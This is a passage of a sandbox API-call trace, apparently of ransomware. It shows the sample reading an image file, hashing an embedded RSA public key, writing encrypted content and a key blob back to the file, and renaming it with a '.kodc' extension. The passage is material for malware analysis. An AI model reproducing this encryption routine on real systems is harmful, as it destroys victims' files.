lpDistanceToMoveHigh=0x0) returned 0x0 [0099.563] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x10bcf, lpOverlapped=0x0) returned 1 [0099.563] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.564] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.564] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.564] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.564] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0099.564] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.565] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.565] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.565] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.565] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.565] GetLastError () returned 0x0 [0099.565] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.565] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0099.565] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.565] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.565] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.565] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.565] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.565] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.565] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.565] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10bd0) returned 0x9ba6d90 [0099.565] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.565] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.565] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.565] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.565] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.565] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.566] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9bbf0 [0099.566] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0099.566] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9bc38 [0099.566] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0099.566] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331af28 [0099.566] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0099.566] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331af10 [0099.566] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.566] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.566] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.566] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0099.566] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331af28 | out: hHeap=0x630000) returned 1 [0099.566] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331af10 | out: hHeap=0x630000) returned 1 [0099.566] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0099.566] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.566] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.566] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0099.566] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0099.566] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331af10 [0099.566] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0099.566] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331af28 [0099.566] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0099.566] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0099.566] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.566] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.566] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.566] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0099.566] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0099.566] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.567] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0099.567] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331af10 | out: hHeap=0x630000) returned 1 [0099.567] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.567] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331af28 | out: hHeap=0x630000) returned 1 [0099.567] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.567] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.567] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0099.567] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.567] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0099.567] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.567] GetCurrentThreadId () returned 0x42c [0099.567] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0099.567] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba5738 [0099.567] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0099.567] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0099.567] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0099.567] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.567] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.567] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0099.567] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.567] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.567] GetCurrentThreadId () returned 0x42c [0099.567] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.568] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.568] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0099.568] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.568] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.568] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.568] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.568] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0099.568] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0099.568] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.568] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0099.568] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.568] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0099.568] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.568] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0099.568] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.568] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.568] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0099.568] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0099.568] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0099.568] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.568] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0099.568] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.568] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331af28 [0099.568] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.568] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0099.568] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.568] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0099.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0099.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0099.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331af10 [0099.569] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0099.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0099.569] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0099.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0099.569] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0099.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x6868a0 [0099.569] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x655c00 [0099.569] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x655be8 [0099.569] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7980 [0099.569] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x655be8 | out: hHeap=0x630000) returned 1 [0099.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x655be8 [0099.569] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x655c00 | out: hHeap=0x630000) returned 1 [0099.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0099.569] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0099.569] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0099.569] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331af28 | out: hHeap=0x630000) returned 1 [0099.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331af28 [0099.569] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0099.569] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0099.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0099.570] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x655be8 | out: hHeap=0x630000) returned 1 [0099.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0099.570] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0099.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c658 [0099.570] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0099.570] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331af28 | out: hHeap=0x630000) returned 1 [0099.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0099.570] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0099.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0099.570] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.570] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0099.570] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0099.570] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0099.570] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0099.570] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0099.570] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.570] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6948b0 | out: hHeap=0x630000) returned 1 [0099.570] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0099.570] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7980 | out: hHeap=0x630000) returned 1 [0099.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6868a0 | out: hHeap=0x630000) returned 1 [0099.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331af10 | out: hHeap=0x630000) returned 1 [0099.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0099.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0099.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0099.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0099.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0099.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9bc38 | out: hHeap=0x630000) returned 1 [0099.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0099.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0099.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0099.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0099.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0099.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0099.571] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba6d90*, nNumberOfBytesToWrite=0x10bca, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba6d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x10bca, lpOverlapped=0x0) returned 1 [0099.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba6d90 | out: hHeap=0x630000) returned 1 [0099.572] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x10bcf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.572] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0099.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0099.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0099.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0099.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0099.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0099.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0099.572] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0099.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.572] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.572] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.572] CloseHandle (hObject=0x5cc) returned 1 [0099.587] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0099.587] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0099.587] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c2cb0 | out: hHeap=0x630000) returned 1 [0099.587] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\G39vaCnIqVU1.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\g39vacniqvu1.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\G39vaCnIqVU1.bmp.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\g39vacniqvu1.bmp.kodc")) returned 1 [0099.587] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0099.587] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.587] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.589] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0099.589] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32121230, ftCreationTime.dwHighDateTime=0x1d5b67d, ftLastAccessTime.dwLowDateTime=0xe8713a80, ftLastAccessTime.dwHighDateTime=0x1d5bad6, ftLastWriteTime.dwLowDateTime=0xe8713a80, ftLastWriteTime.dwHighDateTime=0x1d5bad6, nFileSizeHigh=0x0, nFileSizeLow=0x43ab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GFp qsQfQOaQJIpyl58.bmp", cAlternateFileName="GFPQSQ~1.BMP")) returned 1 [0099.589] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.589] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0099.589] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.589] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GFp qsQfQOaQJIpyl58.bmp") returned=".bmp" [0099.589] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GFp qsQfQOaQJIpyl58.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gfp qsqfqoaqjipyl58.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 